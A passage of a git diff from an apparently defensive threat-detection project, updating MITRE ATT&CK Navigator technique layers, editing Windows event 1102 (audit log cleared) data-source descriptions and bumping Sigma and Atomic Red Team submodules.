"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0020", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0020", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0013", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1222", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1482", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0001", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0001", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1482", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1007", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1021", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1103", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1043", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0139", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1023", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1006", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1043", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1122", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1177", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1182", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1011", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1058", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1041", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true}
\ No newline at end of file
diff --git a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
index e5921a4..67c8a35 100644
--- a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
+++ b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
@@ -1 +1 @@
-{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
\ No newline at end of file
+{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
\ No newline at end of file
diff --git a/data_needed/DN_0025_1102_the_audit_log_was_cleared.yml b/data_needed/DN_0025_1102_the_audit_log_was_cleared.yml
deleted file mode 100644
index 34d1a9e..0000000
--- a/data_needed/DN_0025_1102_the_audit_log_was_cleared.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-title: DN_0038_1102_the_audit_log_was_cleared
-description: >
- Event 1102 is logged whenever the Security log is cleared,
- REGARDLESS of the status of the Audit System Events audit policy
-loggingpolicy:
- - none
-references:
- - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102#security-monitoring-recommendations
- - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
-category: OS Logs
-platform: Windows
-type: Windows Log
-channel: Security
-provider: Microsoft-Windows-Eventlog
-fields:
- - EventID
- - Hostname # redundant
- - Computer
- - SubjectUserSid
- - SubjectUserName
- - SubjectDomainName
- - SubjectLogonId
-sample: |
- -
- -
-
- 1102
- 0
- 4
- 104
- 0
- 0x4020000000000000
-
- 1087729
-
-
- Security
- DC01.contoso.local
-
-
- -
- -
- S-1-5-21-3457937927-2839227994-823803824-1104
- dadmin
- CONTOSO
- 0x55cd1d
-
-
-
-
\ No newline at end of file
diff --git a/data_needed/DN_0050_1102_audit_log_was_cleared.yml b/data_needed/DN_0050_1102_audit_log_was_cleared.yml
index 10674c4..5a6f071 100644
--- a/data_needed/DN_0050_1102_audit_log_was_cleared.yml
+++ b/data_needed/DN_0050_1102_audit_log_was_cleared.yml
@@ -1,10 +1,12 @@
title: DN_0050_1102_audit_log_was_cleared
description: >
- This event generates every time Windows Security audit log was cleared
+ Event 1102 is created whenever the Security log is cleared,
+ REGARDLESS of the status of the Audit System Events audit policy
loggingpolicy:
- None
references:
- https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
category: OS Logs
platform: Windows
type: Windows Log
diff --git a/detection_rules/sigma b/detection_rules/sigma
index 5ea6235..693830f 160000
--- a/detection_rules/sigma
+++ b/detection_rules/sigma
@@ -1 +1 @@
-Subproject commit 5ea623506f95832177c245c8c072d1c71d06c192
+Subproject commit 693830fa838da070e125342bf108efc8cf8f9d42
diff --git a/response/atc-response b/response/atc-response
index f54b8ec..155fbfa 160000
--- a/response/atc-response
+++ b/response/atc-response
@@ -1 +1 @@
-Subproject commit f54b8ec6cb83b7214b9560115df004c404ccbc6c
+Subproject commit 155fbfa6df7b8b10b92f22a2fec083e4db373402
diff --git a/triggers/atomic-red-team b/triggers/atomic-red-team
index 9476a63..d58d614 160000
--- a/triggers/atomic-red-team
+++ b/triggers/atomic-red-team
@@ -1 +1 @@
-Subproject commit 9476a6348d4ce62931993af6b953688666ca2453
+Subproject commit d58d614940e9ac224677c6d49625e5274c0047be